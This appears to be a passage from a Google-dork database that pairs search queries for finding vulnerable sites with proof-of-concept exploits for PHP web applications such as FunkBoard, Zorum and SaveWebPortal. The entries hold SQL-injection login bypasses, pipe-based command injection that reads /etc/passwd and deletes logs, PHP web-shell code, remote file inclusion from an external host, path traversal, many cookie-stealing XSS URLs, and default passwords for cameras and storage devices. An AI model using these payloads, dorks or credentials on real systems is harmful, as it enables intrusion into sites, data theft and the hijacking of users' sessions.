http://[target]/[path]/inc/CommentsApproval.php<br> http://[target]/[path]/inc/Images.php<br> http://[target]/[path]/inc/NewsList.php<br> http://[target]/[path]/inc/Password.php<br> http://[target]/[path]/inc/Post.php<br> http://[target]/[path]/inc/PostsApproval.php<br> http://[target]/[path]/inc/PurgeOldNews.php<br> http://[target]/[path]/inc/SetSticky.php<br> http://[target]/[path]/inc/SetVisible.php<br> http://[target]/[path]/inc/Statistics.php<br> http://[target]/[path]/inc/Template.php<br> 
http://[target]/[path]/inc/UserDefinedCodes.php<br> http://[target]/[path]/inc/Users.php<br> <br> information disclosure:<br> googledork:<br> PHPFreeNews inurl:Admin.php<br> (with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...<br> because this info is shown with nonchalance in the admin.php page ;) )<br> <br> default password:<br> login: Admin<br> pass: Admin<br> <br> MySQL Injection / Login Bypass in previous versions:<br> login: Admin<br> password: ') or isnull(1/0) or ('a'='a<br> <br> note: all string, not consider 'or'<br> <br> in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: <br> <br> login: whateverpass: //') or isnull(1/0) /* this is definitely patched in 1.40 version<br> [descr]] [[url]http://www.google.com/search?q=PHPFreeNews+inurl:Admin.php&hl=it&lr=&filter=0[url]] [[dork]PHPFreeNews inurl:Admin.php[dork]] [end][1364]] [[start][1365] [[title]inurl:nquser.php filetype:php[[title]] [[descr]Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit <br> <br> software: <br> author site: http://www.virtech.org/tools/ <br> <br> a user can execute commands on the target system via the PING panel, if enabled (as often happens), using the pipe char in the <br> input text "Ping IP Address or Host Name", example: <br> <br> | cat /etc/passwd <br> <br> then you will see the plain text password file <br> <br> | pwd <br> <br> to see current path <br> <br> | rm [pwd_output]/logs/nq_log.txt <br> <br> to delete log file... 
<br> <br> disclosure of user activity: <br> if enabled, a user can view the clear text log file through url: <br> <br> http://[target]/[path]/logs/nq_log.txt <br> <br> xss: <br> http://[target]/[path]/submit.php?portnum="/>alert(document.cookie) <br> http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) <br> http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) <br> http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) <br> http://[target]/[path]/nqports.php?step=alert(document.cookie) <br> http://[target]/[path]/nqports2.php?step=alert(document.cookie) <br> http://[target]/[path]/nqports2.php?body=alert(document.cookie) <br> http://[target]/[path]/portlist.php?portnum=alert(document.cookie) <br> <br> <br> a user can use on-line Netquery installations as proxy servers <br> to launch exploits from the HTTP GET request panel, example: <br> exploiting Phpbb 2.0.15: <br> make a get request of <br> http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command].'&command=cat%20/etc/passwd [descr]] [[url]http://www.google.com/search?hl=it&q=inurl%3Anquser.php+filetype%3Aphp&btnG=Cerca+con+Google&meta=[url]] [[dork]inurl:nquser.php filetype:php[dork]] [end][1365]] [[start][1366] [[title]"Powered By: Simplicity oF Upload" inurl:download.php | inurl:upload.php[[title]] [[descr]26/07/2005 16.09.18<br> <br> Simplicity OF Upload 1.3 (possibly prior versions) remote code execution <br> & cross site scripting<br> <br> software: <br> author site: http://www.phpsimplicity.com/scripts.php?id=3<br> <br> <br> remote commands execution:<br> <br> problem at lines 25-30: <br> ...<br> //check for language overriding..<br> if (isset($_GET['language']))<br> $language = strtolower($_GET['language']);<br> <br> //now we include the language file<br> require_once("$language.lng");<br> ...<br> <br> you can include whatever you want by adding a null byte to the "language" parameter value:<br> <br> example:<br> 
http://localhost:30/simply/download.php?language=upload.php%00<br> <br> you will see upload & download page together :)<br> <br> so you can upload a cmd.gif (when you upload a .php file, usually it is<br> renamed to .html...) file with this php code inside to execute<br> commands:<br> <br> <?php<br> <br> system($HTTP_GET_VARS[command]);<br> <br> ?><br> <br> then try this url:<br> <br> http://[target]/[path]/download.php?language=cmd.gif%00&command=ls<br> <br> to list directories<br> <br> http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd<br> <br> to show /etc/passwd file<br> <br> cross site scripting:<br> <br> also, a remote user can supply a specially crafted URL to redirect other people<br> to an evil page:<br> <br> http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00<br> <br> <br> <br> googledork:<br> <br> "Powered By: Simplicity oF Upload"<br> [descr]] [[url]http://www.google.com/search?hl=it&q=%22Powered+By%3A+Simplicity+oF+Upload%22+inurl%3Adownload.php+%7C+inurl%3Aupload.php&btnG=Cerca+con+Google&meta=[url]] [[dork]"Powered By: Simplicity oF Upload" inurl:download.php | inurl:upload.php[dork]] [end][1366]] [[start][1367] [[title]"Powered by FlexPHPNews" inurl:news | inurl:press[[title]] [[descr]24/07/2005 2.38.13<br> <br> Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting & resource consumption poc exploit<br> <br> <br> software:<br> author site:<br> http://www.china-on-site.com/flexphpnews/downloads.php<br> <br> <br> xss / cookie disclosure:<br> <br> http://[target]/[path]/index.php?front_indextitle=</title>alert(document.cookie)<br> http://[target]/[path]/index.php?front_searchsubmit=">alert(document.cookie)<br> http://[target]/[path]/index.php?front_latestnews=">alert(document.cookie)<br> <br> http://[target]/[path]/news.php?newsid=">alert(document.cookie)<br> http://[target]/[path]/news.php?front_rating=">alert(document.cookie)<br> 
http://[target]/[path]/news.php?salt=">alert(document.cookie)<br> http://[target]/[path]/news.php?front_letmerateit=">alert(document.cookie)<br> http://[target]/[path]/news.php?front_ratebest=">alert(document.cookie)<br> http://[target]/[path]/news.php?front_ratesubmit=">alert(document.cookie)<br> http://[target]/[path]/news.php?front_searchsubmit=">alert(document.cookie)<br> <br> http://[target]/[path]/search.php?front_searchresult=</title>alert(document.cookie)<br> http://[target]/[path]/search.php?front_searchsubmit=">alert(document.cookie)<br> <br> http://[target]/[path]/catalog.php?front_searchsubmit=">alert(document.cookie)<br> http://[target]/[path]/catalog.php?front_latestnews=">alert(document.cookie)<br> http://[target]/[path]/catalog.php?catalogid=">alert(document.cookie)<br> <br> <br> path disclosure:<br> <br> http://[target]/[path]/admin/usercheck.php?logincheck=%00<br> <br> <br> denial of service / resources consumption:<br> <br> http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999<br> http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999<br> <br> ($prenumber and $nextnumber are uninitialized final values of a loop...)<br> <br> <br> <br> sql injection / bypass authentication:<br> <br> <br> go to login page:<br> <br> http://[target]/[path]/admin/<br> <br> (usually admin if not changed)<br> <br> login as user: ' OR 'a'='a<br> and pass : ' OR 'a'='a <br> <br> boom! 
you're admin ...<br> <br> the problem is in usercheck.php at line 5:<br> <br> $sql = "select username from newsadmin where username='$checkuser' and password='$checkpass'";<br> <br> you can post always-true statements, like 'a'='a'<br> <br> solution: replace $checkuser and $checkpass vars with your username and pass, for the moment<br> [descr]] [[url]http://www.google.com/search?hl=it&q=%22Powered+by+FlexPHPNews%22+inurl%3Anews+%7C+inurl%3Apress&meta=[url]] [[dork]"Powered by FlexPHPNews" inurl:news | inurl:press[dork]] [end][1367]] [[start][1368] [[title]"Powered by FunkBoard"[title]] [[descr]FunkBoard V0.66CF (possibly prior versions) cross site scripting, <br> possible database username/password disclosure & board takeover, <br> possible remote code execution <br> <br> <br> software: <br> author site: http://www.[path_to_funkboard].co.uk/ <br> <br> xss: <br> http://[target]/[path_to_funkboard]/editpost.php?fbusername=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/editpost.php?fbpassword=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/prefs.php?fbpassword=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/prefs.php?fbusername=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/profile.php?fbusername=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/profile.php?fbpassword=">alert(document.cookie) <br> 
http://[target]/[path_to_funkboard]/register.php?fbusername=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?fmail=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?www=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?icq=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?yim=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?location=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?sex=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?interebbies=">alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?sig=</textarea>alert(document.cookie) <br> http://[target]/[path_to_funkboard]/register.php?aim=">alert(document.cookie) <br> <br> path disclosure: <br> http://[target]/[path_to_funkboard]/images/forums.php <br> <br> database username & password disclosure: <br> <br> during installation the user is not reminded to delete the mysql_install script and the installation <br> does not delete it; usually: <br> <br> http://[target]/[path]/admin/mysql_install.php <br> <br> or <br> <br> http://[target]/[path]/admin/pg_install.php <br> <br> there, a user can see the database clear text username & password ... <br> <br> Then, the script lets the user proceed to the next page, where he can reset the funkboard administrator <br> username & password. Now the script faults, because some tables exist, etc. <br> So the user can go back and set a new database name for installation, guessing among other <br> installations on the server... <br> Once installation has succeeded he can set a new admin username and password, then login at this page: <br> <br> http://[target]/[path]/[path_to_funkboard]/admin/index.php <br> <br> Now the user can edit templates and append some evil javascript code. 
<br> <br> <br> remote code execution: <br> <br> look at this code in mysql_install.php : <br> <br> $infoout = "<?php\n\n// server name, eg. localhost\n\$server = '$server1';\n// your database's name\n\$dbname = '$dbname1';\n// your username to access that database\n\$dbuser = '$dbuser1';"; <br> $infoout.= "\n// your password to access that database\n\$dbpass = '$dbpass1';\n\n// a contact email for when errors arise\n\$email = '$email1';"; <br> $infoout.= "\n\n// database engine- 'mysql' or 'postgres'\n\$dbtype='$dbtype1';\n\n?>"; <br> <br> echo "Writing Config File<br>"; <br> unlink ("../info.php"); <br> <br> $outname="../info.php"; <br> $file = fopen($outname,"w+"); <br> fputs($file, $infoout); <br> fclose($file); <br> <br> clearly, you can inject php code, example: <br> <br> go to http://[target]/[path]/admin/mysql_install.php <br> <br> in the email field (not checked) write: <br> <br> emai&#108;&#064;&#100;omain.com'; error_reporting(0); system($HTTP_GET_VARS[command]); echo ' <br> <br> press continue... <br> <br> now look at info.php, the config file in the main directory, you have: <br> <br> <?php <br> <br> // server name, eg. localhost <br> $server = 'localhost'; <br> // your database's name <br> $dbname = 'dbname'; <br> // your username to access that database <br> $dbuser = 'dbuser'; <br> // your password to access that database <br> $dbpass = 'dbpassword'; <br> <br> // a contact email for when errors arise <br> $email = 'emai&#108;&#064;&#100;omain.com'; error_reporting(0); system($HTTP_GET_VARS[command]); echo ''; <br> <br> // database engine- 'mysql' or 'postgres' <br> $dbtype='mysql'; <br> <br> ?> <br> <br> so, you have a backdoor on the target system... <br> <br> you can launch commands with these urls: <br> <br> http://localhost:30/funkboard/info.php?command=ls%20-la <br> <br> to list directories... 
<br> <br> http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd <br> <br> to see /etc/passwd file <br> [descr]] [[url]http://www.google.com/search?hl=it&q=%22Powered+by+FunkBoard%22&btnG=Cerca+con+Google&meta=[url]] [[dork]"Powered by FunkBoard"[dork]] [end][1368]] [[start][1369] [[title]"Summary View of Sensors" | "sensorProbe8 v *" | "cameraProbe 3.0" -filetype:pdf -filetype:html[[title]] [[descr]sensorProbe is an SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through "Email, SMS or SNMP Alerts in your Network Management system" in advance to prevent any disaster. [descr]] [[url]http://www.google.com/search?q=%22Summary+View+of+Sensors%22+%7C+%22sensorProbe8+v+*%22+%7C+%22cameraProbe+3.0%22+-filetype:pdf+-filetype:html++-site:ihackstuff.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]"Summary View of Sensors" | "sensorProbe8 v *" | "cameraProbe 3.0" -filetype:pdf -filetype:html -site:ihackstuff.com[dork]] [end][1369]] [[start][1370] [[title]intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co[[title]] [[descr][quote]Cisco CallManager<br> <br> CallManager is a FREE web application/interface included with your VoIP telephone service. 
It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.<br> <br> Voice over IP telephone users –<br> Logon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp<br> <br> * User ID – your UWYO Domain username<br> * Password – initial password is 12341234<br> <br> Please create your own unique password after your initial logon<br> <br> [/quote]<br> <br> There are several vulnerabilities for CallManager<br> [descr]] [[url]http://www.google.com/search?q=intitle:%22Cisco+CallManager+User+Options+Log+On%22+%22Please+enter+your+User+ID+and+Password+in+the+spaces+provided+below+and+click+the+Log+On+button+to+continue.%22++-edu&num=100&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to continue." -edu[dork]] [end][1370]] [[start][1371] [[title]intitle:"Owl Intranet " intext:"Owl Intranet Engine" +"Version:" inurl:/intranet/ -edu -ac -gov -org[[title]] [[descr]Owl Intranet Engine is prone to multiple cross-site scripting and SQL injection vulnerabilities. The issues are reported to exist in the 'browse.php' script.<br> <br> An attacker could exploit the cross-site scripting issues by enticing a victim user into following a malicious link that contains hostile HTML and script code. This could be exploited to steal cookie-based authentication credentials.<br> <br> The SQL injection vulnerabilities could allow the attacker to influence the structure or logic of SQL queries made by the application. 
This could have various impacts, including compromise of the software, exposure and modification of sensitive information, or a potential for attacks against the database implementation itself.<br> <br> The attacker may need to provide a valid session ID to exploit these issues.<br> <br> you can also download some of the files where security is not that strong for the anon user.<br> <br> [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1371]] [[start][1372] [[title]intitle:"Powered by OneOrZero" intext:"Powered by OneOrZero v1.4" "login" inurl:helpdesk -demo -edu[[title]] [[descr]An SQL injection issue has been reported to affect OneOrZero Helpdesk. The error presents itself in a OneOrZero Helpdesk script that fails to sufficiently sanitize user-supplied input before including it in SQL queries.<br> <br> Successful exploitation could result in compromise of the OneOrZero Helpdesk site integrity.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=intitle%3A%22Powered+by+OneOrZero%22+intext%3A%22Powered+by+OneOrZero+v1.4%22+%22login%22+inurl%3Ahelpdesk+-demo+-edu&btnG=Search[url]] [[dork]intitle:"Powered by OneOrZero" intext:"Powered by OneOrZero v1.4" "login" inurl:helpdesk -demo -edu[dork]] [end][1372]] [[start][1380] [[title]intitle:"blog torrent upload"[title]] [[descr]Blog Torrent is free, open-source software that provides a way to share large files on your website.<br> <br> vulnerability: free access to the password file<br> http://[target]/[path_of_blog]/data/newusers<br> <br> advisory:<br> http://www.securitytracker.com/alerts/2005/Jul/1014449.html<br> <br> All current versions could be vulnerable depending on directory permissions. 
[descr]] [[url]http://www.google.com/search?q=+intitle%3A%22blog+torrent+upload%22+&sstart=0&start=0&ie=utf-8&oe=utf-8[url]] [[dork] intitle:"blog torrent upload" [dork]] [end][1380]] [[start][1381] [[title]intitle:MyShell 1.1.0 build 20010923[[title]] [[descr]Basically MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on.[descr]] [[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3AMyShell+1.1.0+build+20010923&btnG=Search[url]] [[dork]intitle:MyShell 1.1.0 build 20010923[dork]] [end][1381]] [[start][1382] [[title]intitle:"Network Storage Link for USB 2.0 Disks" Firmware[[title]] [[descr]Networked USB hard drives (NSLU2). Be sure to disable Google's filter (&filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest). A majority are locked, some are not. Some logins to the NSLU2 will be a link off a website. Enjoy.[descr]] [[url]http://www.google.com/search?q=intitle:Network%2BStorage%2BLink%2Bfor%2BUSB%2B2.0+Disks+intext:Disks+User+Log+in+(Private+Data)+++DISK+(Private+Data)+FLASH+(Public+Data)+Firmware+Version++&hl=en&hs=Yms&lr=&client=firefox-a&rls=org.mozilla:en-US:official&[url]] [[dork]intitle:Network+Storage+Link+for+USB+2.0 Disks intext:Disks User Log in (Private Data) DISK (Private Data) FLASH (Public Data) Firmware Version [dork]] [end][1382]] [[start][1384] [[title]intitle:"AlternC Desktop"[title]] [[descr]This finds the login page for AlternC Desktop; I don't know what versions.[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22AlternC+Desktop%22[url]] [[dork]intitle:"AlternC Desktop"[dork]] [end][1384]] [[start][1385] [[title]intitle:"communigate pro * *" intitle:"entrance"[title]] [[descr]Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. 
The directory link from this page can in some instances be used to query user information.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22communigate+pro+*+*%22+intitle%3A%22entrance%22&btnG=Search[url]] [[dork]intitle:"communigate pro * *" intitle:"entrance"[dork]] [end][1385]] [[start][1386] [[title]inurl:index.php fees shop link.codes merchantAccount[[title]] [[descr]Vulnerability in EPay systems<br> PHP file inclusion<br> http://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwd<br> advisory:<br> http://www.cyberlords.net/advisories/cl_epay.txt<br> <br> EPay Pro version 2.0 is vulnerable to this issue.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aindex.php+fees+shop+link.codes+merchantAccount+&btnG=Search[url]] [[dork]inurl:index.php fees shop link.codes merchantAccount [dork]] [end][1386]] [[start][1389] [[title]intitle:"admin panel" +"Powered by RedKernel"[title]] [[descr]This finds all versions of RedKernel Referer Tracker (stats page); it just gives out some nice info[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22admin+panel%22+%2B%22Powered+by+RedKernel%22+-site%3Aihackstuff.com&btnG=Search[url]] [[dork]intitle:"admin panel" +"Powered by RedKernel" -site:ihackstuff.com[dork]] [end][1389]] [[start][1390] [[title]intitle:phpnews.login[[title]] [[descr]Vulnerable script auth.php (SQL injection)<br> <br> --- from rst.void.ru ---<br> Possible scenario of attack:<br> [1] log in to admin panel, using SQL injection<br> [2] upload PHP file through "Upload Images" function (index.php?action=images) and have fun with php shell<br> or edit template (index.php?action=modtemp) and put backdoor code into it.<br> -------------------------<br> <br> http://www.securityfocus.com/bid/14333/info<br> http://rst.void.ru/papers/advisory31.txt<br> <br> The version number may sometimes be found in error messages.[descr]] 
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3Aphpnews.login+&btnG=Search[url]] [[dork]intitle:phpnews.login [dork]] [end][1390]] [[start][1392] [[title]"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com[[title]] [[descr]This finds all versions of the inspanel login page.[descr]] [[url]http://www.google.com/search?q=%22inspanel%22+intitle:%22login%22+-%22cannot%22+%22Login+ID%22+-site:inspediumsoft.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com[dork]] [end][1392]] [[start][1393] [[title]intitle:iDVR -intitle:"com | net | shop" -inurl:"asp | htm | pdf | html | php | shtml | com | at | cgi | tv"[title]] [[descr]Online camera. Default login is administrator and password blank. Video server runs by default on port 2000. There is an application DVR Center that is used to connect to the server and manage recorded videos. [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1393]] [[start][1394] [[title]"HostingAccelerator" intitle:"login" +"Username" -"news" -demo[[title]] [[descr]This will find the login portal for HostingAccelerator ControlPanel. I have not looked for exploits for these so I don't know if there are any. So far I have seen versions 1.9, 2.2 and 2.4 found by this dork.[descr]] [[url]http://www.google.com/search?q=%22HostingAccelerator%22+intitle:%22login%22+%2B%22Username%22+-%22news%22+-demo&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]"HostingAccelerator" intitle:"login" +"Username" -"news" -demo[dork]] [end][1394]] [[start][1395] [[title]intitle:"INTELLINET" intitle:"IP Camera Homepage"[title]] [[descr] This googledork finds INTELLINET ip cameras. They are used to monitor things and have a web interface. Most of the pages load with the default username and password of guest. The user manual says that the default admin username/password is admin/admin. 
At the time of posting this googledork had 10 results.<br> <br> p.s. This was discovered by jeffball55 and cleaned up by golfo[descr]] [[url]http://www.google.com/search?q=intitle:%22INTELLINET%22+intitle:%22IP+Camera+Homepage%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]] [[dork]intitle:"INTELLINET" intitle:"IP Camera Homepage"[dork]] [end][1395]] [[start][1396] [[title]"Powered by Zorum 3.5"[title]] [[descr]Zorum 3.5 remote code execution poc exploit<br> <br> software:<br> description: Zorum is a freely available, open source Web-based forum<br> application implemented in PHP. It is available for UNIX, Linux, and any other<br> platform that supports PHP script execution.<br> <br> author site: http://zorum.phpoutsourcing.com/<br> <br> <br> 1) remote code execution:<br> <br> vulnerable code, in /gorum/prod.php file:<br> <br> <br> 07 $doubleApp = isset($argv[1]); <br> <br> ...<br> 14 if( $doubleApp )<br> 15 {<br> 16 $appDir = $argv[1];<br> 17 system("mkdir $prodDir/$appDir");<br> ...<br> <br> a user can execute arbitrary commands using pipe char, example:<br> <br> http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la<br> <br> to list directories<br> <br> http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php<br> <br> to see database username/password...<br> <br> http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd<br> <br> to see /etc/passwd file<br> <br> <br> <br> 2) path disclosure:<br> <br> http://[target]/zorum/gorum/notification.php<br> http://[target]/zorum/user.php<br> http://[target]/zorum/attach.php<br> http://[target]/zorum/blacklist.php<br> http://[target]/zorum/forum.php<br> http://[target]/zorum/globalstat.php<br> http://[target]/zorum/gorum/trace.php<br> http://[target]/zorum/gorum/badwords.php<br> http://[target]/zorum/gorum/flood.php<br> <br> and so on...<br> <br> googledork:<br> <br> "Powered by Zorum 3.5"<br> <br> <br> rgod<br> site: http://rgod.altervista.org<br> mail: retrogod at aliceposta it<br> <br> original 
advisory: http://rgod.altervista.org/zorum.html<br> [descr]] [[url]http://www.google.com/search?hl=it&q=%22Powered+by+Zorum+3.5%22&meta=[url]] [[dork]"Powered by Zorum 3.5"[dork]] [end][1396]] [[start][1397] [[title]intitle:"xams 0.0.0..15 - Login"[title]] [[descr]This is the login for xams; it should catch from 0.0.1-0.0.15,<br> 0.0.15 being the latest version. As far as I can see there are only versions 0.0.13, 0.0.14 and 0.0.15[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22xams+0.0.0..15+-+Login%22&btnG=Google+Search[url]] [[dork]intitle:"xams 0.0.0..15 - Login"[dork]] [end][1397]] [[start][1399] [[title]"powered by ITWorking"[title]] [[descr]SaveWebPortal 3.4 remote code execution / admin check bypass / remote file<br> inclusion / cross site scripting <br> <br> author site: http://www.circeos.it<br> download page: http://www.circeos.it/frontend/index.php?page=downloads<br> <br> <br> a) remote code execution:<br> <br> a user can bypass the admin check, calling this url:<br> <br> http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Source<br> <br> now can leave a backdoor in header.php or some other file, example:<br> <br> <?php <br> error_reporting(0);<br> passtrhu($HTTP_GET_VARS[command]);<br> ?><br> <br> after editing the template, the user can execute arbitrary system commands, through a<br> url like this:<br> <br> http://[target]/saveweb/header.php?command=ls%20-la<br> <br> to list directories...<br> <br> http://[target]/saveweb/header.php?command=cat%20config.inc.php<br> <br> to see database username/password and admin panel username/password <br> (now the attacker has full access to site configuration... 
can go to<br> http://[target]/saveweb/admin/<br> to login...<br> )<br> <br> http://[target]/saveweb/header.php?command=cat%20/etc/passwd<br> <br> to see passwd file...<br> <br> <br> b) arbitrary file inclusion:<br> <br> a user can view any file on the target server, if not with .php extension:<br> <br> http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00<br> http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00<br> <br> can execute an arbitrary file resident on the target server, if with .php extension,<br> example :<br> <br> http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00<br> http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00<br> <br> can craft a malicious url to cause a victim user to execute commands on an external<br> site:<br> <br> http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00<br> http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00<br> <br> where cmd.gif is a file like this:<br> <br> <?php system('[some command]'); ?><br> <br> <br> c) xss:<br> <br> c.1)<br> http://[target]/saveweb/footer.php?TABLE_Width=>alert(document.cookie)<br> http://[target]/saveweb/footer.php?SITE_Author_Domain=>alert(document.cookie)<br> http://[target]/saveweb/footer.php?SITE_Author=>alert(document.cookie)<br> http://[target]/saveweb/footer.php?L_Info=>alert(document.cookie)<br> http://[target]/saveweb/footer.php?L_Help=>alert(document.cookie)<br> http://[target]/saveweb/header.php?TABLE_Width=>alert(document.cookie)<br> http://[target]/saveweb/header.php?L_Visitors=>alert(document.cookie)<br> http://[target]/saveweb/header.php?count=>alert(document.cookie)<br> http://[target]/saveweb/header.php?SITE_Logo=">alert(document.cookie)<br> http://[target]/saveweb/header.php?BANNER_Url=">alert(document.cookie)<br> <br> http://[target]/saveweb/header.php?L_Sunday="}alert(document.cookie)<!--<br> 
http://[target]/saveweb/header.php?L_Monday="}alert(document.cookie)<!--<br> and so on...<br> <br> http://[target]/saveweb/header.php?L_January="}alert(document.cookie)<!--<br> http://[target]/saveweb/header.php?L_February="}alert(document.cookie)<!--<br> and so on...<br> <br> http://[target]/saveweb/header.php?IMAGES_Url=">alert(document.cookie)<!--<br> http://[target]/saveweb/header.php?L_Info=">alert(document.cookie)<!--<br> http://[target]/saveweb/header.php?L_Help=">alert(document.cookie)<!--<br> <br> http://[target]/saveweb/menu_dx.php?L_InsertCorrectly=alert(document.cookie)<br> http://[target]/saveweb/menu_dx.php?L_MENUDX_Login=alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?L_MENUDX_Username=alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?L_MENUDX_Password=alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?L_Ok=alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?IMAGES_Url=">alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?L_MENUDX_Registration=">alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?BANNER_Url=">alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?L_MENUSX_Newsletter=alert(document.cookie)<!--<br> http://[target]/saveweb/menu_dx.php?L_MENUDX_InsertEMail=alert(document.cookie)<!--<br> <br> http://[target]/saveweb/menu_sx.php?L_InsertNOK3Char=");}alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Channels=alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Home=alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Archive=alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_Search=alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_Ok=alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?IMAGES_Url=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Services=">alert(document.cookie)<br> 
http://[target]/saveweb/menu_sx.php?L_MENUSX_Links=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Newsletter=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Polls=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_ECards=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Downloads=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Community=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Forum=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Chat=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Nicknames=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Membership=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Login=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_UserProfile=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_PasswordForgot=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Logout=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Contacts=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_Guestbook=">alert(document.cookie)<br> http://[target]/saveweb/menu_sx.php?L_MENUSX_ContactUs=">alert(document.cookie)<br> <br> c.2) a user can inject evil javascript code in the HTTP_REFERER and 